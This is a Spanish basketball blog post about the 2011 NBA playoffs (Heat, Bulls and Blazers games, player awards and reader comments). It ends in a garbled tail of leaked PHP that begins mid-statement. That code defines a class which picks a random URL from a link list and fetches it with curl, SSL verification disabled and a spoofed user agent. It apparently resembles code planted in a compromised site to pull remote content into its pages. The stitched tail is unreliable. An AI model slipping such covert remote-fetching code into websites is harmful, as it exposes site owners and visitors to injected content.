Playoffs (21/04/2011): Demasiado “Big Three”

22 de April de 2011 por txusma

Chicago y Miami ya están con un 3-0 en la eliminatoria, a un solo paso de cumplir todos nuestros pronósticos de barrida.

No fueron partidos fáciles. En Philadelphia, los Sixers salieron a la cancha con toda la intención de llevarse el partido y luchar por volver a Miami. De la mano de Jrue Holiday jugaron un muy buen primer cuarto y obtuvieron hasta 12 puntos de ventaja que fueron capaces de mantener hasta mediados del tercer período. A partir de ahí,  Dwyane Wade  cogió el mando y se erigió en el mejor jugador del partido una vez recuperado de los problemas de migraña que le habían mermado en el segundo encuentro (100-94). Los Sixers ya no encontraron respuestas. A pesar de la teórica debilidad en el juego interior, Miami cogió 50 rebotes, 20 de ellos ofensivos (récord de la temporada) mientras que Philadelphia se quedó en 34.

Indiana volvió a casa con una sola idea en mente: parar a Derrick Rose de cualquier manera. Danthay Jones  y Paul George se turnaron en ese trabajo con la ayuda de todos sus compañeros y el plan les salió perfecto durante 47 minutos y 43 segundos. En ese tiempo, Rose sólo fue capaz de anotar 3 canastas en juego, una en toda la 2ª parte, pero aún así el partido llegaba igualado a los segundos finales gracias al acierto de Deng, Korver y al mismo Rose desde la línea de tiros libres. A falta de 17 segundos, el futuro MVP rompía el empate con una entrada ‘made in Rose’ que a la postre sería definitiva. Debe ser duro saber qué jugador asumirá el tiro y no tener manera de pararlo (88-84).

Los Blazers fueron los únicos capaces de ganar su partido en casa y poner el 2-1 en la eliminatorias y lo hicieron con un buen partido de Brandon Roy. El 3 veces AllStars declaró tras el segundo partido que estaba realmente decepcionado por los pocos minutos con los que había contado, frustrado seguramente por la derrota y por la difícil situación que ha pasado esta temporada tras sus dos intervenciones de rodilla. Tras pedir disculpas a la afición, saltó a la cancha con otra mentalidad, mucho más positiva, y fue determinante saliendo desde el banco para que los Blazers se llevaran la victoria enu partido que Portland controló de principio a fin y que remató en el último período de la mano de Wesly Mattheews y Lamarcus Aldridge (92-97).

PREMIOS

MVP: Dwyane Wade nos ofreció un partido de mucho nivel y en Playoffs, que es cuando los grandes jugadores aparecen. Se quedó muy cerquita del triple doble con 32 puntos, 10 rebotes y 8 asistencias. Su compañero Lebron James se fue a los 24 puntos, 15 rebotes y 6 asistencias. Demasiado para los Sixers.

Sorpresa: Tal cual ha ido la temporada, que Brandon Roy anote 16 puntos y reparta 4 asistencias en 24 minutos es toda una sorpresa. Esperemos que sea el primer paso para recuperar la confianza y acercarse de nuevo al mega jugador que era antes de las lesiones.

Decepción: Tras un primer partido de la serie en el que dominaron al juego interior de Chicago, Hansbrough y Hibbert han visto como los ajustes de Thibodeau han hecho bajar su rendimiento. Anoche sólo anotaron 6 canastas de 24 intentos y no fueron capaces de marcar diferencias en ningún momento.

Esfuerzo en vano: Jason Terry anotó 29 puntos, incluídos 5 triples, en la derrota de su equipo frente los Blazers. Dirk Nowitzki se fue a los 25 a los que sumó 9 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. ralage dice:
    #1

    Creo q en la 1a parte, hemos visto lo máximo que pueden ofrecer estos 76ers, pero simplemente, no llega.

      Citar

  2. Denise dice:
    #2

    Estos Heat se van a pasear por el Este. Que equipazo.
    Buena noticia el buen partido de Roy.
    Indiana le ha cuajado tres muy buenos partidos a Chicago, pero me temo que se van a ir con un 4-0 a casita.

      Citar

  3. Len Bias dice:
    #3

    Qué pena me da lo de Roy, saber que no vamos a poder disfrutar nunca más del superjugador que era. A ver si, al menos, nos deja destellos de vez en cuando

      Citar

  4. Toni dice:
    #4

    Este chico tenia potencial para liderar una buena franquicia bien secundado por L.A.

    PD: http://www.youtube.com/watch?v=MlBq-qXUdcs

      Citar

  5. Txusma dice:
    #5

    Lo gracioso es que los Bulls van 3-0 con Noah, Boozer y Deng jugando muy por debajo de su nivel. Se tendrán que poner las pilas si quieren llegar más lejos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>